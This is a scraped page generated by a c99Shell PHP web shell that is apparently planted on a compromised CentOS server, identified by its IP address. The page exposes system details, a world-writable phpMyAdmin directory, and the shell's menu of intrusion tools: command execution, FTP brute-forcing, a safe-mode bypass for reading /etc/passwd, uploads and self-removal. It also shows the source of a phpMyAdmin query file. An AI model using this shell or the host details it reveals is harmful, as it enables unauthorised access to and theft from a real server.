110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/phpMyAdmin/ drwxrwxrwx Free 52.6 GB of 127.8 GB (41.16%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/ drwxrwxrwx
Free 52.6 GB of 127.8 GB (41.16%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: db_details_qbe.php (35.59 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

execute it, else display the headers */ if ( isset( $_REQUEST['submit_sql'] ) && preg_match('@^SELECT@i', $_REQUEST['encoded_sql_query']) ) { $goto = 'db_details.php'; $zero_rows = htmlspecialchars($GLOBALS['strSuccess']); $sql_query = urldecode($_REQUEST['encoded_sql_query']); require('./sql.php'); exit(); } else { $sub_part = '_qbe'; require('./libraries/db_details_common.inc.php'); $url_query .= '&goto=db_details_qbe.php'; $url_params['goto'] = 'db_details_qbe.php'; require('./libraries/db_details_db_info.inc.php'); } if ( isset($_REQUEST['submit_sql'] ) && ! preg_match('@^SELECT@i', $_REQUEST['encoded_sql_query']) ) { echo '

' . $GLOBALS['strHaveToShow'] . '

'; } /** * Initialize some variables */ $col_cnt = isset( $_REQUEST['col_cnt'] ) ? (int) $_REQUEST['col_cnt'] : 3; $add_col = isset( $_REQUEST['add_col'] ) ? (int) $_REQUEST['add_col'] : 0; $add_row = isset( $_REQUEST['add_row'] ) ? (int) $_REQUEST['add_row'] : 0; $rows = isset( $_REQUEST['rows'] ) ? (int) $_REQUEST['rows'] : 0; $ins_col = isset( $_REQUEST['ins_col'] ) ? $_REQUEST['ins_col'] : array(); $del_col = isset( $_REQUEST['del_col'] ) ? $_REQUEST['del_col'] : array(); $prev_criteria = isset( $_REQUEST['prev_criteria'] ) ? $_REQUEST['prev_criteria'] : array(); $criteria = isset( $_REQUEST['criteria'] ) ? $_REQUEST['criteria'] : array_fill(0, $col_cnt, ''); $ins_row = isset( $_REQUEST['ins_row'] ) ? $_REQUEST['ins_row'] : array_fill(0, $col_cnt, ''); $del_row = isset( $_REQUEST['del_row'] ) ? $_REQUEST['del_row'] : array_fill(0, $col_cnt, ''); $and_or_row = isset( $_REQUEST['and_or_row'] ) ? $_REQUEST['and_or_row'] : array_fill(0, $col_cnt, ''); $and_or_col = isset( $_REQUEST['and_or_col'] ) ? $_REQUEST['and_or_col'] : array_fill(0, $col_cnt, ''); // minimum width $form_column_width = 12; $col = max($col_cnt + $add_col, 0); $row = max($rows + $add_row, 0); // The tables list sent by a previously submitted form if (!empty($TableList)) { $cnt_table_list = count($TableList); for ($x = 0; $x < $cnt_table_list; $x++) { $tbl_names[urldecode($TableList[$x])] = ' selected="selected"'; } } // end if $columns = PMA_DBI_get_columns_full( $GLOBALS['db'] ); $tables = PMA_DBI_get_columns_full( $GLOBALS['db'] ); /** * Prepares the form */ $tbl_result = PMA_DBI_query('SHOW TABLES FROM ' . PMA_backquote($db) . ';', null, PMA_DBI_QUERY_STORE); $tbl_result_cnt = PMA_DBI_num_rows($tbl_result); $i = 0; $k = 0; // The tables list gets from MySQL while ($i < $tbl_result_cnt) { list($tbl) = PMA_DBI_fetch_row($tbl_result); $fld_results = PMA_DBI_get_fields($db, $tbl); $fld_results_cnt = ($fld_results) ? count($fld_results) : 0; $j = 0; if (empty($tbl_names[$tbl]) && !empty($TableList)) { $tbl_names[$tbl] = ''; } else { $tbl_names[$tbl] = ' selected="selected"'; } // end if // The fields list per selected tables if ($tbl_names[$tbl] == ' selected="selected"') { $fld[$k++] = PMA_backquote($tbl) . '.*'; while ($j < $fld_results_cnt) { $fld[$k] = PMA_convert_display_charset($fld_results[$j]['Field']); $fld[$k] = PMA_backquote($tbl) . '.' . PMA_backquote($fld[$k]); // increase the width if necessary if (strlen($fld[$k]) > $form_column_width) { $form_column_width = strlen($fld[$k]); } //end if $k++; $j++; } // end while } // end if $i++; } // end if PMA_DBI_free_result($tbl_result); // largest width found $realwidth = $form_column_width . 'ex'; /** * Displays the Query by example form */ function showColumnSelectCell( $columns, $column_number, $selected = '' ) { ?>

:	:	/>
:	:	/>

:	:	/>
:	:	/>

: /> : />

:
$val) { $strTableListOptions .= ' '; $strTableListOptions .= '' . "\n"; $numTableListOptions++; } ?>		<?php // 1. SELECT $last_select = 0; $encoded_qry = ''; if (!isset($qry_select)) { $qry_select = ''; } for ($x = 0; $x < $col; $x++) { if (!empty($curField[$x]) && isset($curShow[$x]) && $curShow[$x] == 'on') { if ($last_select) { $qry_select .= ', '; } $qry_select .= $curField[$x]; $last_select = 1; } } // end for if (!empty($qry_select)) { $encoded_qry .= urlencode('SELECT ' . $qry_select . "\n"); echo 'SELECT ' . htmlspecialchars($qry_select) . "\n"; } // 2. FROM // Create LEFT JOINS out of Relations // Code originally by Mike Beck <mike.beck@ibmiller.de> // If we can use Relations we could make some left joins. // First find out if relations are available in this database. // First we need the really needed Tables - those in TableList might still be // all Tables. if (isset($Field) && count($Field) > 0) { // Initialize some variables $tab_all = array(); $col_all = array(); $tab_wher = array(); $tab_know = array(); $tab_left = array(); $col_where = array(); $fromclause = ''; // We only start this if we have fields, otherwise it would be dumb foreach ($Field AS $value) { $parts = explode('.', $value); if (!empty($parts[0]) && !empty($parts[1])) { $tab_raw = urldecode($parts[0]); $tab = str_replace('`', '', $tab_raw); $tab_all[$tab] = $tab; $col_raw = urldecode($parts[1]); $col_all[] = $tab . '.' . str_replace('`', '', $col_raw); } } // end while // Check 'where' clauses if ($cfgRelation['relwork'] && count($tab_all) > 0) { // Now we need all tables that we have in the where clause $crit_cnt = count($criteria); for ($x = 0; $x < $crit_cnt; $x++) { $curr_tab = explode('.', urldecode($Field[$x])); if (!empty($curr_tab[0]) && !empty($curr_tab[1])) { $tab_raw = urldecode($curr_tab[0]); $tab = str_replace('`', '', $tab_raw); $col_raw = urldecode($curr_tab[1]); $col1 = str_replace('`', '', $col_raw); $col1 = $tab . '.' . $col1; // Now we know that our array has the same numbers as $criteria // we can check which of our columns has a where clause if (!empty($criteria[$x])) { if (substr($criteria[$x], 0, 1) == '=' \|\| stristr($criteria[$x], 'is')) { $col_where[$col] = $col1; $tab_wher[$tab] = $tab; } } // end if } // end if } // end for // Cleans temp vars w/o further use unset($tab_raw); unset($col_raw); unset($col1); if (count($tab_wher) == 1) { // If there is exactly one column that has a decent where-clause // we will just use this $master = key($tab_wher); } else { // Now let's find out which of the tables has an index // ( When the control user is the same as the normal user // because he is using one of his databases as pmadb, // the last db selected is not always the one where we need to work) PMA_DBI_select_db($db); foreach ($tab_all AS $tab) { $ind_rs = PMA_DBI_query('SHOW INDEX FROM ' . PMA_backquote($tab) . ';'); while ($ind = PMA_DBI_fetch_assoc($ind_rs)) { $col1 = $tab . '.' . $ind['Column_name']; if (isset($col_all[$col1])) { if ($ind['non_unique'] == 0) { if (isset($col_where[$col1])) { $col_unique[$col1] = 'Y'; } else { $col_unique[$col1] = 'N'; } } else { if (isset($col_where[$col1])) { $col_index[$col1] = 'Y'; } else { $col_index[$col1] = 'N'; } } } } // end while (each col of tab) } // end while (each tab) // now we want to find the best. if (isset($col_unique) && count($col_unique) > 0) { $col_cand = $col_unique; $needsort = 1; } elseif (isset($col_index) && count($col_index) > 0) { $col_cand = $col_index; $needsort = 1; } elseif (isset($col_where) && count($col_where) > 0) { $col_cand = $tab_wher; $needsort = 0; } else { $col_cand = $tab_all; $needsort = 0; } // If we came up with $col_unique (very good) or $col_index (still // good) as $col_cand we want to check if we have any 'Y' there // (that would mean that they were also found in the whereclauses // which would be great). if yes, we take only those if ($needsort == 1) { foreach ($col_cand AS $col => $is_where) { $tab = explode('.', $col); $tab = $tab[0]; if ($is_where == 'Y') { $vg[$col] = $tab; } else { $sg[$col] = $tab; } } if (isset($vg)) { $col_cand = $vg; // Candidates restricted in index+where } else { $col_cand = $sg; // None of the candidates where in a where-clause } } // If our array of candidates has more than one member we'll just // find the smallest table. // Of course the actual query would be faster if we check for // the Criteria which gives the smallest result set in its table, // but it would take too much time to check this if (count($col_cand) > 1) { // Of course we only want to check each table once $checked_tables = $col_cand; foreach ($col_cand AS $tab) { if ($checked_tables[$tab] != 1 ) { $tsize[$tab] = PMA_countRecords($db, $tab, true, false); $checked_tables[$tab] = 1; } $csize[$tab] = $tsize[$tab]; } asort($csize); reset($csize); $master = key($csize); // Smallest } else { reset($col_cand); $master = current($col_cand); // Only one single candidate } } // end if (exactly one where clause) /** * Removes unwanted entries from an array (PHP3 compliant) * * @param array the array to work with * @param array the list of keys to remove * * @return array the cleaned up array * * @access private / function PMA_arrayShort($array, $key) { foreach ($array AS $k => $v) { if ($k != $key) { $reta[$k] = $v; } } if (!isset($reta)) { $reta = array(); } return $reta; } // end of the "PMA_arrayShort()" function /* * Finds all related tables * * @param string wether to go from master to foreign or vice versa * * @return boolean always TRUE * * @global array the list of tables that we still couldn't connect * @global array the list of allready connected tables * @global string the current databse name * @global string the super user connection id * @global array the list of relation settings * * @access private / function PMA_getRelatives($from) { global $tab_left, $tab_know, $fromclause; global $controllink, $db, $cfgRelation; if ($from == 'master') { $to = 'foreign'; } else { $to = 'master'; } $in_know = '(\'' . implode('\', \'', $tab_know) . '\')'; $in_left = '(\'' . implode('\', \'', $tab_left) . '\')'; $rel_query = 'SELECT ' . ' FROM ' . PMA_backquote($cfgRelation['relation']) . ' WHERE ' . $from . '_db = \'' . PMA_sqlAddslashes($db) . '\'' . ' AND ' . $to . '_db = \'' . PMA_sqlAddslashes($db) . '\'' . ' AND ' . $from . '_table IN ' . $in_know . ' AND ' . $to . '_table IN ' . $in_left; PMA_DBI_select_db($cfgRelation['db'], $controllink); $relations = @PMA_DBI_query($rel_query, $controllink); PMA_DBI_select_db($db, $controllink); while ($row = PMA_DBI_fetch_assoc($relations)) { $found_table = $row[$to . '_table']; if (isset($tab_left[$found_table])) { $fromclause .= "\n" . ' LEFT JOIN ' . PMA_backquote($row[$to . '_table']) . ' ON ' . PMA_backquote($row[$from . '_table']) . '.' . PMA_backquote($row[$from . '_field']) . ' = ' . PMA_backquote($row[$to . '_table']) . '.' . PMA_backquote($row[$to . '_field']) . ' '; $tab_know[$found_table] = $found_table; $tab_left = PMA_arrayShort($tab_left, $found_table); } } // end while return TRUE; } // end of the "PMA_getRelatives()" function $tab_left = PMA_arrayShort($tab_all, $master); $tab_know[$master] = $master; $run = 0; $emerg = ''; while (count($tab_left) > 0) { if ($run % 2 == 0) { PMA_getRelatives('master'); } else { PMA_getRelatives('foreign'); } $run++; if ($run > 5) { foreach ($tab_left AS $tab) { $emerg .= ', ' . PMA_backquote($tab); $tab_left = PMA_arrayShort($tab_left, $tab); } } } // end while $qry_from = PMA_backquote($master) . $emerg . $fromclause; } // end if ($cfgRelation['relwork'] && count($tab_all) > 0) } // end count($Field) > 0 // In case relations are not defined, just generate the FROM clause // from the list of tables, however we don't generate any JOIN if (empty($qry_from) && isset($tab_all)) { $qry_from = implode(', ', $tab_all); } // Now let's see what we got if (!empty($qry_from)) { $encoded_qry .= urlencode('FROM ' . $qry_from . "\n"); echo 'FROM ' . htmlspecialchars($qry_from) . "\n"; } // 3. WHERE $qry_where = ''; $criteria_cnt = 0; for ($x = 0; $x < $col; $x++) { if (!empty($curField[$x]) && !empty($curCriteria[$x]) && $x && isset($last_where) && isset($curAndOrCol)) { $qry_where .= ' ' . strtoupper($curAndOrCol[$last_where]) . ' '; } if (!empty($curField[$x]) && !empty($curCriteria[$x])) { $qry_where .= '(' . $curField[$x] . ' ' . $curCriteria[$x] . ')'; $last_where = $x; $criteria_cnt++; } } // end for if ($criteria_cnt > 1) { $qry_where = '(' . $qry_where . ')'; } // OR rows ${'cur' . $or}[$x] if (!isset($curAndOrRow)) { $curAndOrRow = array(); } for ($y = 0; $y <= $row; $y++) { $criteria_cnt = 0; $qry_orwhere = ''; $last_orwhere = ''; for ($x = 0; $x < $col; $x++) { if (!empty($curField[$x]) && !empty(${'curOr' . $y}[$x]) && $x) { $qry_orwhere .= ' ' . strtoupper($curAndOrCol[$last_orwhere]) . ' '; } if (!empty($curField[$x]) && !empty(${'curOr' . $y}[$x])) { $qry_orwhere .= '(' . $curField[$x] . ' ' . ${'curOr' . $y}[$x] . ')'; $last_orwhere = $x; $criteria_cnt++; } } // end for if ($criteria_cnt > 1) { $qry_orwhere = '(' . $qry_orwhere . ')'; } if (!empty($qry_orwhere)) { $qry_where .= "\n" . strtoupper(isset($curAndOrRow[$y]) ? $curAndOrRow[$y] . ' ' : '') . $qry_orwhere; } // end if } // end for if (!empty($qry_where) && $qry_where != '()') { $encoded_qry .= urlencode('WHERE ' . $qry_where . "\n"); echo 'WHERE ' . htmlspecialchars($qry_where) . "\n"; } // end if // 4. ORDER BY $last_orderby = 0; if (!isset($qry_orderby)) { $qry_orderby = ''; } for ($x = 0; $x < $col; $x++) { if ($last_orderby && $x && !empty($curField[$x]) && !empty($curSort[$x])) { $qry_orderby .= ', '; } if (!empty($curField[$x]) && !empty($curSort[$x])) { // if they have chosen all fields using the * selector, // then sorting is not available // Robbat2 - Fix for Bug #570698 if (substr($curField[$x], -2) != '.*') { $qry_orderby .= $curField[$x] . ' ' . $curSort[$x]; $last_orderby = 1; } } } // end for if (!empty($qry_orderby)) { $encoded_qry .= urlencode('ORDER BY ' . $qry_orderby); echo 'ORDER BY ' . htmlspecialchars($qry_orderby) . "\n"; } ?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0056 ]--